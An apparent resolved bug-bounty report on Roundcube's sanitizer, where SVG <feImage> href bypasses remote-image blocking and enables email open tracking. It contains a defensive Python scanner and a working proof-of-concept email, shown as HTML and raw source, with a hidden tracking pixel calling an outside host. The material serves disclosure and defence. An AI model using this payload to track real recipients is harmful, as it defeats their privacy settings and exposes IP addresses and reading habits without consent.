SVG filter primitives bypass remote image blocking, enabling email tracking without consent.
Medium
Vulnerability Details
## Summary:
When `allow_remote` is set to `false`, Roundcube's HTML sanitizer [rcube_washtml](https://github.com/roundcube/roundcubemail/blob/5162a0d9d7b05728500375611a2fb4fc55844c7c/program/lib/Roundcube/rcube_washtml.php) blocks external resources in `<img>`, `<image>`, and `<use>` tags by checking their `src`/`href` attributes through `is_image_attribute()`.
However, the `<feImage>` SVG filter primitive is on the element allowlist while its `href` attribute is not recognized as an image source. Instead, the attribute is processed by `wash_link()`, which permits external HTTP/HTTPS URLs, so the referenced image is fetched even though remote images are blocked.
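An added example, not Roundcube's code, that reproduces the gap as a scanner: with the sanitizer's original image-tag set the `<img>` beacon is found but the `<feImage>` href is not; adding the filter primitive to the set closes it. The message body and the tracker host are constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags whose src/href attribute loads image content. A sanitizer that knows only
# the first three treats <feImage href> as an ordinary link, which is the gap the
# report describes; the fixed set adds the SVG filter primitive.
IMAGE_TAGS_ORIGINAL = {"img", "image", "use"}
IMAGE_TAGS_FIXED = IMAGE_TAGS_ORIGINAL | {"feimage"}   # HTMLParser lowercases tag names
IMAGE_ATTRS = {"src", "href", "xlink:href"}


def is_remote(url: str) -> bool:
    """True for http(s) URLs; data:, cid: and relative references are not remote."""
    return urlparse(url.strip()).scheme.lower() in ("http", "https")


class RemoteImageFinder(HTMLParser):
    """Records (tag, attribute, url) for every remote image reference on the given tags."""

    def __init__(self, image_tags):
        super().__init__()
        self.image_tags = image_tags
        self.found = []

    def handle_starttag(self, tag, attrs):   # also reached for self-closing <feImage .../>
        if tag not in self.image_tags:
            return
        for name, value in attrs:
            if name in IMAGE_ATTRS and value and is_remote(value):
                self.found.append((tag, name, value))


def find_remote_images(html: str, image_tags=IMAGE_TAGS_FIXED):
    """Return the remote image references a sanitizer with this tag set would block."""
    parser = RemoteImageFinder(image_tags)
    parser.feed(html)
    parser.close()
    return parser.found


# Constructed message body modelled on the report's PoC; tracker.example is a placeholder.
SAMPLE = """<p>Hello</p>
<img src="https://tracker.example/open.gif" width="1" height="1">
<svg width="1" height="1"><defs><filter id="t">
<feImage href="https://tracker.example/pixel.png" width="1" height="1"/>
<feImage href="data:image/gif;base64,R0lGODlhAQABAAAAACw=" width="1" height="1"/>
</filter></defs><rect filter="url(#t)" width="1" height="1"/></svg>"""
```

Run `find_remote_images(SAMPLE, IMAGE_TAGS_ORIGINAL)` and `find_remote_images(SAMPLE)` to compare what each tag set catches; the inline `data:` image is never flagged because it makes no network request.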
## Steps To Reproduce:
Step 1: Send an HTML e-mail with embedded SVG
```html
<!DOCTYPE html>
<html>
<head><title>Important Document</title></head>
<body>
<h1>Important Information</h1>
<p>Dear valued customer,</p>
<p>Please review the attached information carefully.</p>
<svg width="1" height="1" style="position:absolute;left:-9999px;">
<defs>
<filter id="t">
<feImage href="https://httpbin.org/image/[email protected]" width="1" height="1"/>
</filter>
</defs>
<rect filter="url(#t)" width="1" height="1"/>
</svg>
<p>Best regards,<br>Totally Legitimate Company</p>
</body>
</html>
```
Step 2: Open the e-mail in Roundcube with remote image blocking enabled and observe the HTTP request made to `https://httpbin.org/image/[email protected]`
## Supporting Material/References:
{F5185346}
### Show Source
```
Return-Path: <[email protected]>
Received: from xxx
Content-Type: multipart/alternative; boundary="===============5782437078710662677=="
MIME-Version: 1.0
Subject: Important: Please Review This Document
From: [email protected]
To: [email protected]
--===============5782437078710662677==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Please enable HTML to view this message.
--===============5782437078710662677==
Content-Type: text/html; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
<!DOCTYPE html>
<html>
<head><title>Important Document</title></head>
<body>
<h1>Important Information</h1>
<p>Dear valued customer,</p>
<p>Please review the attached information carefully.</p>
<svg width="1" height="1" style="position:absolute;left:-9999px;">
<defs>
<filter id="t">
<feImage href="https://httpbin.org/image/[email protected]" width="1" height="1"/>
</filter>
</defs>
<rect filter="url(#t)" width="1" height="1"/>
</svg>
<p>Best regards,<br>Totally Legitimate Company</p>
</body>
</html>
--===============5782437078710662677==--
```
## Impact
Attackers can embed invisible tracking pixels in emails that load even when "Block remote images" is enabled, allowing:
1. Email open tracking / read receipts without consent
2. IP address disclosure (Geolocation inference)
3. User agent fingerprinting
## Report Stats
- Report ID: 3486747
- State: Closed
- Substate: resolved
- Upvotes: 3